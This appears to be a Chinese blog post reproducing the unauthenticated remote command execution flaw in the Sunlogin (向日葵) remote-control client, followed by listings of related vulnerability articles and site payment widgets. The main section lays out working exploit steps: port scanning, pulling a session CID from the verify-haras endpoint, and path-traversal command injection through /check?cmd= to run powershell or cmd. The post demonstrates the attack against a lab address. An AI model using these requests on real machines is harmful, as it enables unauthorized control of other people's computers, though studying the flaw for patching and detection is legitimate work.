向日葵远控rce复现

最新推荐文章于 2024-04-16 08:53:59 发布
最新推荐文章于 2024-04-16 08:53:59 发布
阅读量2.8k 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/123104293
版权

向日葵

POC

ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami

在这里插入图片描述

端口扫描

首先扫描端口
在这里插入图片描述

获取sid

可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras

每次访问不一样,但是都可以用

dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3

远程命令执行

/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami

/check?cmd=ping../../../SysWOW64/cmd.exe+/c+whoami 

Cookie: CID=6onb943qKJoXQGAmr1BKArugFlO9949g

在这里插入图片描述

后记

利用的是未授权获取session+命令拼接导致的远程命令执行

6ri9ht
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
向日葵RCE
weixin_43622525的博客
02-28 700
目录 漏洞描述 漏洞 手动 解决方法 漏洞描述 上海贝锐信息科技股份有限公司的向日葵软件存在程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞 下载含有漏洞版本的向日葵,win7虚拟...
向日葵rce漏洞
weixin_59872639的博客
03-01 3068
向日葵 向日葵制是一款提供制服务的软件。向日葵制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和制安装了向日葵制客户端的设备 影响版本 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞 PortScan探测或其他工具探测40000到65535的开放端口 浏览器访问ip+端口号+ /c.
向日葵漏洞(含批量验证poc)(1),2024年最新网络安全程序员怎么优雅迈过30K+这道坎
最新发布
时间与思念
04-16 379
可以走的很快,但一群人才能走的更!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
向日葵RCECNVD-2022-10270/CNVD-2022-03672
sechelper的博客
02-19 315
手工过程,相关工具的使用与分享,批量检测利用
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
CNVD-2022-10207:向日葵RCE
qq_50854662的博客
11-22 596
CNVD-2022-10207:向日葵RCE
制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE与解决
Gjqhs的博客
03-01 3280
上海贝锐信息科技股份有限公司的向日葵软件存在程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 实验环境 :win10虚拟机 工具下载(含有漏洞版本的向日葵):https://github.com/Mr-xn/sunlog...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2020-0796微软SMBv3协议RCE1
08-03
声明:请勿用作违法用途,否则后果自负简介SMB( 全 称 是 Server Message Block) 是 一 个 协 议 名 , 它 能 被 用 于 Web
CVE-2019-1003000 Jenkins-PreAuth-RCE 过程1
08-04
前言前几天听小伙伴说 Jenkins 出了个 RCE 我以为是说之前那个需要登录后才能RCE 的漏洞 。但结果小伙伴说这次这个不用登录就能 RCE 是 Oran
微信RCE
锋刃科技的博客
04-23 1208
漏洞概述 攻击者只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 环境搭建 微信PC版本 2.9.0.123 漏洞 生成payload 将’\’批量替换成’,0′ 再放置shellcode 把链接通过微信发送,然后我们点击链接,cs上线成功。 源码 <htm...
CVE-2020-0796 RCE
子曰小玖的博客
07-10 391
0x01 简介 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。 0x02 漏洞概述 **(CVE-2020-0796 SMBGhost)**该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。 0
RCE漏洞
qq_43757105的博客
09-14 905
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
微信RCE漏洞
m0_46171781的博客
05-02 2388
微信RCE漏洞 一、涉及版本: 微信 Windows 版:< 3.1.2.141 根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本 二、过程: 1.开启cobalt strike监听 2.使用cobalt strike生成shellcode 3.将生成的shellcode进行处理,将\替换为,0 4.写入js代码中 5.在html文件中调用此js代码 6.在靶机中使用微信
向日葵RCE
m0_64338211的博客
03-01 2006
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
CVE-2022-10270(向日葵程代码执行漏洞)
BGiscool的博客
02-22 3523
CVE-2022-10270-向日葵程代码执行漏洞
fastjson rce
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为...需要注意的是,fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值